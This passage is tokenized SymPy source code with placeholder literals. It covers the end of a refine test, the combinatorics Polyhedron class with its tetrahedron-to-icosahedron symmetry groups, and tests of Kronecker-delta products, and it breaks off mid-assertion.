. my_member == refine ( x ) . my_member <EOL> def test_eval_refine ( ) : <EOL> from sympy . core . expr import Expr <EOL> class MockExpr ( Expr ) : <EOL> def _eval_refine ( self , assumptions ) : <EOL> return True <EOL> mock_obj = MockExpr ( ) <EOL> assert refine ( mock_obj ) </s>
<s> from __future__ import print_function , division <EOL> from sympy . core import Basic , Tuple <EOL> from sympy . sets import FiniteSet <EOL> from sympy . core . compatibility import as_int , range <EOL> from sympy . combinatorics import Permutation as Perm <EOL> from sympy . combinatorics . perm_groups import PermutationGroup <EOL> from sympy . utilities . iterables import ( minlex , unflatten , flatten ) <EOL> rmul = Perm . rmul <EOL> class Polyhedron ( Basic ) : <EOL> """<STR_LIT>""" <EOL> _edges = None <EOL> def __new__ ( cls , corners , faces = [ ] , pgroup = [ ] ) : <EOL> """<STR_LIT>""" <EOL> faces = [ minlex ( f , directed = False , is_set = True ) for f in faces ] <EOL> corners , faces , pgroup = args = [ Tuple ( * a ) for a in ( corners , faces , pgroup ) ] <EOL> obj = Basic . __new__ ( cls , * args ) <EOL> obj . _corners = tuple ( corners ) <EOL> obj . _faces = FiniteSet ( * faces ) <EOL> if pgroup and pgroup [ <NUM_LIT:0> ] . size != len ( corners ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> obj . _pgroup = PermutationGroup ( ( <EOL> pgroup or [ Perm ( range ( len ( corners ) ) ) ] ) ) <EOL> return obj <EOL> @ property <EOL> def corners ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _corners <EOL> vertices = corners <EOL> @ property <EOL> def array_form ( self ) : <EOL> """<STR_LIT>""" <EOL> corners = list ( self . args [ <NUM_LIT:0> ] ) <EOL> return [ corners . index ( c ) for c in self . corners ] <EOL> @ property <EOL> def cyclic_form ( self ) : <EOL> """<STR_LIT>""" <EOL> return Perm . _af_new ( self . array_form ) . cyclic_form <EOL> @ property <EOL> def size ( self ) : <EOL> """<STR_LIT>""" <EOL> return len ( self . _corners ) <EOL> @ property <EOL> def faces ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _faces <EOL> @ property <EOL> def pgroup ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _pgroup <EOL> @ property <EOL> def edges ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . 
_edges is None : <EOL> output = set ( ) <EOL> for face in self . faces : <EOL> for i in range ( len ( face ) ) : <EOL> edge = tuple ( sorted ( [ face [ i ] , face [ i - <NUM_LIT:1> ] ] ) ) <EOL> output . add ( edge ) <EOL> self . _edges = FiniteSet ( * output ) <EOL> return self . _edges <EOL> def rotate ( self , perm ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( perm , Perm ) : <EOL> perm = self . pgroup [ perm ] <EOL> else : <EOL> if perm . size != self . size : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> a = perm . array_form <EOL> corners = [ self . corners [ a [ i ] ] for i in range ( len ( self . corners ) ) ] <EOL> self . _corners = tuple ( corners ) <EOL> def reset ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _corners = self . args [ <NUM_LIT:0> ] <EOL> def _pgroup_calcs ( ) : <EOL> """<STR_LIT>""" <EOL> def _pgroup_of_double ( polyh , ordered_faces , pgroup ) : <EOL> n = len ( ordered_faces [ <NUM_LIT:0> ] ) <EOL> fmap = dict ( zip ( ordered_faces , <EOL> range ( len ( ordered_faces ) ) ) ) <EOL> flat_faces = flatten ( ordered_faces ) <EOL> new_pgroup = [ ] <EOL> for i , p in enumerate ( pgroup ) : <EOL> h = polyh . copy ( ) <EOL> h . rotate ( p ) <EOL> c = h . corners <EOL> reorder = unflatten ( [ c [ j ] for j in flat_faces ] , n ) <EOL> reorder = [ tuple ( map ( as_int , <EOL> minlex ( f , directed = False , is_set = True ) ) ) <EOL> for f in reorder ] <EOL> new_pgroup . 
append ( Perm ( [ fmap [ f ] for f in reorder ] ) ) <EOL> return new_pgroup <EOL> tetrahedron_faces = [ <EOL> ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ) , ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:3> ) , ( <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:1> ) , <EOL> ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) , <EOL> ] <EOL> _t_pgroup = [ <EOL> Perm ( [ [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , [ <NUM_LIT:0> ] ] ) , <EOL> Perm ( [ [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] , [ <NUM_LIT:3> ] ] ) , <EOL> Perm ( [ [ <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:2> ] , [ <NUM_LIT:1> ] ] ) , <EOL> Perm ( [ [ <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:1> ] , [ <NUM_LIT:2> ] ] ) , <EOL> Perm ( [ [ <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:2> , <NUM_LIT:3> ] ] ) , <EOL> Perm ( [ [ <NUM_LIT:0> , <NUM_LIT:2> ] , [ <NUM_LIT:1> , <NUM_LIT:3> ] ] ) , <EOL> Perm ( [ [ <NUM_LIT:0> , <NUM_LIT:3> ] , [ <NUM_LIT:1> , <NUM_LIT:2> ] ] ) , <EOL> ] <EOL> tetrahedron = Polyhedron ( <EOL> range ( <NUM_LIT:4> ) , <EOL> tetrahedron_faces , <EOL> _t_pgroup ) <EOL> cube_faces = [ <EOL> ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) , <EOL> ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:4> ) , ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:6> , <NUM_LIT:5> ) , ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:7> , <NUM_LIT:6> ) , ( <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:7> , <NUM_LIT:4> ) , <EOL> ( <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> ) , <EOL> ] <EOL> _c_pgroup = [ Perm ( p ) for p in <EOL> [ <EOL> [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:4> ] , <EOL> [ <NUM_LIT:4> , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:7> , <NUM_LIT:5> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:6> ] , <EOL> [ <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:7> , <NUM_LIT:6> , <NUM_LIT:2> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:7> , <NUM_LIT:6> ] , <EOL> [ <NUM_LIT:6> , 
<NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:4> ] , <EOL> [ <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:5> , <NUM_LIT:4> , <NUM_LIT:0> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:3> , <NUM_LIT:7> , <NUM_LIT:4> , <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:6> , <NUM_LIT:5> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:4> , <NUM_LIT:7> , <NUM_LIT:6> , <NUM_LIT:5> , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:6> , <NUM_LIT:5> , <NUM_LIT:4> , <NUM_LIT:7> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:7> , <NUM_LIT:4> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:6> , <NUM_LIT:5> ] , <EOL> [ <NUM_LIT:5> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:4> , <NUM_LIT:6> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:7> ] , <EOL> [ <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:7> , <NUM_LIT:3> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:7> , <NUM_LIT:4> , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:6> , <NUM_LIT:5> , <NUM_LIT:1> , <NUM_LIT:2> ] , <EOL> ] ] <EOL> cube = Polyhedron ( <EOL> range ( <NUM_LIT:8> ) , <EOL> cube_faces , <EOL> _c_pgroup ) <EOL> octahedron_faces = [ <EOL> ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ) , ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:3> ) , ( <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:4> ) , ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:4> ) , <EOL> ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:5> ) , ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:5> ) , ( <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ) , ( <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:5> ) , <EOL> ] <EOL> octahedron = Polyhedron ( <EOL> range ( <NUM_LIT:6> ) , <EOL> octahedron_faces , <EOL> _pgroup_of_double ( cube , cube_faces , _c_pgroup ) ) <EOL> dodecahedron_faces = [ <EOL> ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ) , <EOL> ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:6> , <NUM_LIT:10> , <NUM_LIT:5> ) , ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:7> , <NUM_LIT:11> , 
<NUM_LIT:6> ) , ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:8> , <NUM_LIT:12> , <NUM_LIT:7> ) , <EOL> ( <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:9> , <NUM_LIT> , <NUM_LIT:8> ) , ( <NUM_LIT:0> , <NUM_LIT:4> , <NUM_LIT:9> , <NUM_LIT> , <NUM_LIT:5> ) , <EOL> ( <NUM_LIT:5> , <NUM_LIT:10> , <NUM_LIT:16> , <NUM_LIT:15> , <NUM_LIT> ) , ( <NUM_LIT:6> , <NUM_LIT:10> , <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT:11> ) , ( <NUM_LIT:7> , <NUM_LIT:11> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT:12> ) , <EOL> ( <NUM_LIT:8> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT:9> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:15> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:15> , <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> ] <EOL> def _string_to_perm ( s ) : <EOL> rv = [ Perm ( range ( <NUM_LIT:20> ) ) ] <EOL> p = None <EOL> for si in s : <EOL> if si not in '<STR_LIT>' : <EOL> count = int ( si ) - <NUM_LIT:1> <EOL> else : <EOL> count = <NUM_LIT:1> <EOL> if si == '<STR_LIT:0>' : <EOL> p = _f0 <EOL> elif si == '<STR_LIT:1>' : <EOL> p = _f1 <EOL> rv . extend ( [ p ] * count ) <EOL> return Perm . rmul ( * rv ) <EOL> _f0 = Perm ( [ <EOL> <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:0> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:9> , <NUM_LIT:5> , <NUM_LIT:11> , <EOL> <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:15> ] ) <EOL> _f1 = Perm ( [ <EOL> <NUM_LIT:5> , <NUM_LIT:0> , <NUM_LIT:4> , <NUM_LIT:9> , <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT> , <NUM_LIT:15> , <EOL> <NUM_LIT:6> , <NUM_LIT:2> , <NUM_LIT:8> , <NUM_LIT> , <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT:11> , <NUM_LIT:7> , <NUM_LIT:12> , <NUM_LIT> ] ) <EOL> _dodeca_pgroup = [ _f0 , _f1 ] + [ _string_to_perm ( s ) for s in '''<STR_LIT>''' . strip ( ) . 
split ( ) ] <EOL> dodecahedron = Polyhedron ( <EOL> range ( <NUM_LIT:20> ) , <EOL> dodecahedron_faces , <EOL> _dodeca_pgroup ) <EOL> icosahedron_faces = [ <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] , [ <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:3> ] , [ <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:4> ] , [ <NUM_LIT:0> , <NUM_LIT:4> , <NUM_LIT:5> ] , [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:5> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:6> , <NUM_LIT:7> ] , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:7> ] , [ <NUM_LIT:2> , <NUM_LIT:7> , <NUM_LIT:8> ] , [ <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:8> ] , [ <NUM_LIT:3> , <NUM_LIT:8> , <NUM_LIT:9> ] , <EOL> [ <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:9> ] , [ <NUM_LIT:4> , <NUM_LIT:9> , <NUM_LIT:10> ] , [ <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:10> ] , [ <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:10> ] , [ <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:6> ] , <EOL> [ <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:11> ] , [ <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:11> ] , [ <NUM_LIT:8> , <NUM_LIT:9> , <NUM_LIT:11> ] , [ <NUM_LIT:9> , <NUM_LIT:10> , <NUM_LIT:11> ] , [ <NUM_LIT:6> , <NUM_LIT:10> , <NUM_LIT:11> ] ] <EOL> icosahedron = Polyhedron ( <EOL> range ( <NUM_LIT:12> ) , <EOL> icosahedron_faces , <EOL> _pgroup_of_double ( <EOL> dodecahedron , dodecahedron_faces , _dodeca_pgroup ) ) <EOL> return ( tetrahedron , cube , octahedron , dodecahedron , icosahedron , <EOL> tetrahedron_faces , cube_faces , octahedron_faces , <EOL> dodecahedron_faces , icosahedron_faces ) <EOL> ( tetrahedron , cube , octahedron , dodecahedron , icosahedron , <EOL> tetrahedron_faces , cube_faces , octahedron_faces , <EOL> dodecahedron_faces , icosahedron_faces ) = _pgroup_calcs ( ) </s>
<s> from sympy . concrete import Sum <EOL> from sympy . concrete . delta import deltaproduct as dp , deltasummation as ds <EOL> from sympy . core import Eq , S , symbols , oo <EOL> from sympy . functions import KroneckerDelta as KD , Piecewise , piecewise_fold <EOL> from sympy . logic import And <EOL> i , j , k , l , m = symbols ( "<STR_LIT>" , integer = True , finite = True ) <EOL> x , y = symbols ( "<STR_LIT>" , commutative = False ) <EOL> def test_deltaproduct_trivial ( ) : <EOL> assert dp ( x , ( j , <NUM_LIT:1> , <NUM_LIT:0> ) ) == <NUM_LIT:1> <EOL> assert dp ( x , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == x ** <NUM_LIT:3> <EOL> assert dp ( x + y , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == ( x + y ) ** <NUM_LIT:3> <EOL> assert dp ( x * y , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == ( x * y ) ** <NUM_LIT:3> <EOL> assert dp ( KD ( i , j ) , ( k , <NUM_LIT:1> , <NUM_LIT:3> ) ) == KD ( i , j ) <EOL> assert dp ( x * KD ( i , j ) , ( k , <NUM_LIT:1> , <NUM_LIT:3> ) ) == x ** <NUM_LIT:3> * KD ( i , j ) <EOL> assert dp ( x * y * KD ( i , j ) , ( k , <NUM_LIT:1> , <NUM_LIT:3> ) ) == ( x * y ) ** <NUM_LIT:3> * KD ( i , j ) <EOL> def test_deltaproduct_basic ( ) : <EOL> assert dp ( KD ( i , j ) , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == <NUM_LIT:0> <EOL> assert dp ( KD ( i , j ) , ( j , <NUM_LIT:1> , <NUM_LIT:1> ) ) == KD ( i , <NUM_LIT:1> ) <EOL> assert dp ( KD ( i , j ) , ( j , <NUM_LIT:2> , <NUM_LIT:2> ) ) == KD ( i , <NUM_LIT:2> ) <EOL> assert dp ( KD ( i , j ) , ( j , <NUM_LIT:3> , <NUM_LIT:3> ) ) == KD ( i , <NUM_LIT:3> ) <EOL> assert dp ( KD ( i , j ) , ( j , <NUM_LIT:1> , k ) ) == KD ( i , <NUM_LIT:1> ) * KD ( k , <NUM_LIT:1> ) + KD ( k , <NUM_LIT:0> ) <EOL> assert dp ( KD ( i , j ) , ( j , k , <NUM_LIT:3> ) ) == KD ( i , <NUM_LIT:3> ) * KD ( k , <NUM_LIT:3> ) + KD ( k , <NUM_LIT:4> ) <EOL> assert dp ( KD ( i , j ) , ( j , k , l ) ) == KD ( i , l ) * KD ( k , l ) + KD ( k , l + <NUM_LIT:1> ) <EOL> def test_deltaproduct_mul_x_kd ( ) : <EOL> assert dp ( x * KD ( i , j ) , ( j , 
<NUM_LIT:1> , <NUM_LIT:3> ) ) == <NUM_LIT:0> <EOL> assert dp ( x * KD ( i , j ) , ( j , <NUM_LIT:1> , <NUM_LIT:1> ) ) == x * KD ( i , <NUM_LIT:1> ) <EOL> assert dp ( x * KD ( i , j ) , ( j , <NUM_LIT:2> , <NUM_LIT:2> ) ) == x * KD ( i , <NUM_LIT:2> ) <EOL> assert dp ( x * KD ( i , j ) , ( j , <NUM_LIT:3> , <NUM_LIT:3> ) ) == x * KD ( i , <NUM_LIT:3> ) <EOL> assert dp ( x * KD ( i , j ) , ( j , <NUM_LIT:1> , k ) ) == x * KD ( i , <NUM_LIT:1> ) * KD ( k , <NUM_LIT:1> ) + KD ( k , <NUM_LIT:0> ) <EOL> assert dp ( x * KD ( i , j ) , ( j , k , <NUM_LIT:3> ) ) == x * KD ( i , <NUM_LIT:3> ) * KD ( k , <NUM_LIT:3> ) + KD ( k , <NUM_LIT:4> ) <EOL> assert dp ( x * KD ( i , j ) , ( j , k , l ) ) == x * KD ( i , l ) * KD ( k , l ) + KD ( k , l + <NUM_LIT:1> ) <EOL> def test_deltaproduct_mul_add_x_y_kd ( ) : <EOL> assert dp ( ( x + y ) * KD ( i , j ) , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == <NUM_LIT:0> <EOL> assert dp ( ( x + y ) * KD ( i , j ) , ( j , <NUM_LIT:1> , <NUM_LIT:1> ) ) == ( x + y ) * KD ( i , <NUM_LIT:1> ) <EOL> assert dp ( ( x + y ) * KD ( i , j ) , ( j , <NUM_LIT:2> , <NUM_LIT:2> ) ) == ( x + y ) * KD ( i , <NUM_LIT:2> ) <EOL> assert dp ( ( x + y ) * KD ( i , j ) , ( j , <NUM_LIT:3> , <NUM_LIT:3> ) ) == ( x + y ) * KD ( i , <NUM_LIT:3> ) <EOL> assert dp ( ( x + y ) * KD ( i , j ) , ( j , <NUM_LIT:1> , k ) ) == ( x + y ) * KD ( i , <NUM_LIT:1> ) * KD ( k , <NUM_LIT:1> ) + KD ( k , <NUM_LIT:0> ) <EOL> assert dp ( ( x + y ) * KD ( i , j ) , ( j , k , <NUM_LIT:3> ) ) == ( x + y ) * KD ( i , <NUM_LIT:3> ) * KD ( k , <NUM_LIT:3> ) + KD ( k , <NUM_LIT:4> ) <EOL> assert dp ( ( x + y ) * KD ( i , j ) , ( j , k , l ) ) == ( x + y ) * KD ( i , l ) * KD ( k , l ) + KD ( k , l + <NUM_LIT:1> ) <EOL> def test_deltaproduct_add_kd_kd ( ) : <EOL> assert dp ( KD ( i , k ) + KD ( j , k ) , ( k , <NUM_LIT:1> , <NUM_LIT:3> ) ) == <NUM_LIT:0> <EOL> assert dp ( KD ( i , k ) + KD ( j , k ) , ( k , <NUM_LIT:1> , <NUM_LIT:1> ) ) == KD ( i , <NUM_LIT:1> ) + KD ( j , <NUM_LIT:1> ) <EOL> 
assert dp ( KD ( i , k ) + KD ( j , k ) , ( k , <NUM_LIT:2> , <NUM_LIT:2> ) ) == KD ( i , <NUM_LIT:2> ) + KD ( j , <NUM_LIT:2> ) <EOL> assert dp ( KD ( i , k ) + KD ( j , k ) , ( k , <NUM_LIT:3> , <NUM_LIT:3> ) ) == KD ( i , <NUM_LIT:3> ) + KD ( j , <NUM_LIT:3> ) <EOL> assert dp ( KD ( i , k ) + KD ( j , k ) , ( k , <NUM_LIT:1> , l ) ) == KD ( l , <NUM_LIT:0> ) + KD ( i , <NUM_LIT:1> ) * KD ( l , <NUM_LIT:1> ) + KD ( j , <NUM_LIT:1> ) * KD ( l , <NUM_LIT:1> ) + KD ( i , <NUM_LIT:1> ) * KD ( j , <NUM_LIT:2> ) * KD ( l , <NUM_LIT:2> ) + KD ( j , <NUM_LIT:1> ) * KD ( i , <NUM_LIT:2> ) * KD ( l , <NUM_LIT:2> ) <EOL> assert dp ( KD ( i , k ) + KD ( j , k ) , ( k , l , <NUM_LIT:3> ) ) == KD ( l , <NUM_LIT:4> ) + KD ( i , <NUM_LIT:3> ) * KD ( l , <NUM_LIT:3> ) + KD ( j , <NUM_LIT:3> ) * KD ( l , <NUM_LIT:3> ) + KD ( i , <NUM_LIT:2> ) * KD ( j , <NUM_LIT:3> ) * KD ( l , <NUM_LIT:2> ) + KD ( i , <NUM_LIT:3> ) * KD ( j , <NUM_LIT:2> ) * KD ( l , <NUM_LIT:2> ) <EOL> assert dp ( KD ( i , k ) + KD ( j , k ) , ( k , l , m ) ) == KD ( l , m + <NUM_LIT:1> ) + KD ( i , m ) * KD ( l , m ) + KD ( j , m ) * KD ( l , m ) + KD ( i , m ) * KD ( j , m - <NUM_LIT:1> ) * KD ( l , m - <NUM_LIT:1> ) + KD ( i , m - <NUM_LIT:1> ) * KD ( j , m ) * KD ( l , m - <NUM_LIT:1> ) <EOL> def test_deltaproduct_mul_x_add_kd_kd ( ) : <EOL> assert dp ( x * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:1> , <NUM_LIT:3> ) ) == <NUM_LIT:0> <EOL> assert dp ( x * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:1> , <NUM_LIT:1> ) ) == x * ( KD ( i , <NUM_LIT:1> ) + KD ( j , <NUM_LIT:1> ) ) <EOL> assert dp ( x * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:2> , <NUM_LIT:2> ) ) == x * ( KD ( i , <NUM_LIT:2> ) + KD ( j , <NUM_LIT:2> ) ) <EOL> assert dp ( x * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:3> , <NUM_LIT:3> ) ) == x * ( KD ( i , <NUM_LIT:3> ) + KD ( j , <NUM_LIT:3> ) ) <EOL> assert dp ( x * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:1> , l ) ) == KD ( l , <NUM_LIT:0> ) + x * KD ( i , 
<NUM_LIT:1> ) * KD ( l , <NUM_LIT:1> ) + x * KD ( j , <NUM_LIT:1> ) * KD ( l , <NUM_LIT:1> ) + x ** <NUM_LIT:2> * KD ( i , <NUM_LIT:1> ) * KD ( j , <NUM_LIT:2> ) * KD ( l , <NUM_LIT:2> ) + x ** <NUM_LIT:2> * KD ( j , <NUM_LIT:1> ) * KD ( i , <NUM_LIT:2> ) * KD ( l , <NUM_LIT:2> ) <EOL> assert dp ( x * ( KD ( i , k ) + KD ( j , k ) ) , ( k , l , <NUM_LIT:3> ) ) == KD ( l , <NUM_LIT:4> ) + x * KD ( i , <NUM_LIT:3> ) * KD ( l , <NUM_LIT:3> ) + x * KD ( j , <NUM_LIT:3> ) * KD ( l , <NUM_LIT:3> ) + x ** <NUM_LIT:2> * KD ( i , <NUM_LIT:2> ) * KD ( j , <NUM_LIT:3> ) * KD ( l , <NUM_LIT:2> ) + x ** <NUM_LIT:2> * KD ( i , <NUM_LIT:3> ) * KD ( j , <NUM_LIT:2> ) * KD ( l , <NUM_LIT:2> ) <EOL> assert dp ( x * ( KD ( i , k ) + KD ( j , k ) ) , ( k , l , m ) ) == KD ( l , m + <NUM_LIT:1> ) + x * KD ( i , m ) * KD ( l , m ) + x * KD ( j , m ) * KD ( l , m ) + x ** <NUM_LIT:2> * KD ( i , m - <NUM_LIT:1> ) * KD ( j , m ) * KD ( l , m - <NUM_LIT:1> ) + x ** <NUM_LIT:2> * KD ( i , m ) * KD ( j , m - <NUM_LIT:1> ) * KD ( l , m - <NUM_LIT:1> ) <EOL> def test_deltaproduct_mul_add_x_y_add_kd_kd ( ) : <EOL> assert dp ( ( x + y ) * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:1> , <NUM_LIT:3> ) ) == <NUM_LIT:0> <EOL> assert dp ( ( x + y ) * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:1> , <NUM_LIT:1> ) ) == ( x + y ) * ( KD ( i , <NUM_LIT:1> ) + KD ( j , <NUM_LIT:1> ) ) <EOL> assert dp ( ( x + y ) * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:2> , <NUM_LIT:2> ) ) == ( x + y ) * ( KD ( i , <NUM_LIT:2> ) + KD ( j , <NUM_LIT:2> ) ) <EOL> assert dp ( ( x + y ) * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:3> , <NUM_LIT:3> ) ) == ( x + y ) * ( KD ( i , <NUM_LIT:3> ) + KD ( j , <NUM_LIT:3> ) ) <EOL> assert dp ( ( x + y ) * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:1> , l ) ) == KD ( l , <NUM_LIT:0> ) + ( x + y ) * KD ( i , <NUM_LIT:1> ) * KD ( l , <NUM_LIT:1> ) + ( x + y ) * KD ( j , <NUM_LIT:1> ) * KD ( l , <NUM_LIT:1> ) + ( x + y ) ** <NUM_LIT:2> * KD ( i , 
<NUM_LIT:1> ) * KD ( j , <NUM_LIT:2> ) * KD ( l , <NUM_LIT:2> ) + ( x + y ) ** <NUM_LIT:2> * KD ( j , <NUM_LIT:1> ) * KD ( i , <NUM_LIT:2> ) * KD ( l , <NUM_LIT:2> ) <EOL> assert dp ( ( x + y ) * ( KD ( i , k ) + KD ( j , k ) ) , ( k , l , <NUM_LIT:3> ) ) == KD ( l , <NUM_LIT:4> ) + ( x + y ) * KD ( i , <NUM_LIT:3> ) * KD ( l , <NUM_LIT:3> ) + ( x + y ) * KD ( j , <NUM_LIT:3> ) * KD ( l , <NUM_LIT:3> ) + ( x + y ) ** <NUM_LIT:2> * KD ( i , <NUM_LIT:2> ) * KD ( j , <NUM_LIT:3> ) * KD ( l , <NUM_LIT:2> ) + ( x + y ) ** <NUM_LIT:2> * KD ( i , <NUM_LIT:3> ) * KD ( j , <NUM_LIT:2> ) * KD ( l , <NUM_LIT:2> ) <EOL> assert dp ( ( x + y ) * ( KD ( i , k ) + KD ( j , k ) ) , ( k , l , m ) ) == KD ( l , m + <NUM_LIT:1> ) + ( x + y ) * KD ( i , m ) * KD ( l , m ) + ( x + y ) * KD ( j , m ) * KD ( l , m ) + ( x + y ) ** <NUM_LIT:2> * KD ( i , m - <NUM_LIT:1> ) * KD ( j , m ) * KD ( l , m - <NUM_LIT:1> ) + ( x + y ) ** <NUM_LIT:2> * KD ( i , m ) * KD ( j , m - <NUM_LIT:1> ) * KD ( l , m - <NUM_LIT:1> ) <EOL> def test_deltaproduct_add_mul_x_y_mul_x_kd ( ) : <EOL> assert dp ( x * y + x * KD ( i , j ) , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == ( x * y ) ** <NUM_LIT:3> + x * ( x * y ) ** <NUM_LIT:2> * KD ( i , <NUM_LIT:1> ) + ( x * y ) * x * ( x * y ) * KD ( i , <NUM_LIT:2> ) + ( x * y ) ** <NUM_LIT:2> * x * KD ( i , <NUM_LIT:3> ) <EOL> assert dp ( x * y + x * KD ( i , j ) , ( j , <NUM_LIT:1> , <NUM_LIT:1> ) ) == x * y + x * KD ( i , <NUM_LIT:1> ) <EOL> assert dp ( x * y + x * KD ( i , j ) , ( j , <NUM_LIT:2> , <NUM_LIT:2> ) ) == x * y + x * KD ( i , <NUM_LIT:2> ) <EOL> assert dp ( x * y + x * KD ( i , j ) , ( j , <NUM_LIT:3> , <NUM_LIT:3> ) ) == x * y + x * KD ( i , <NUM_LIT:3> ) <EOL> assert dp ( x * y + x * KD ( i , j ) , ( j , <NUM_LIT:1> , k ) ) == ( x * y ) ** k + Piecewise ( <EOL> ( ( x * y ) 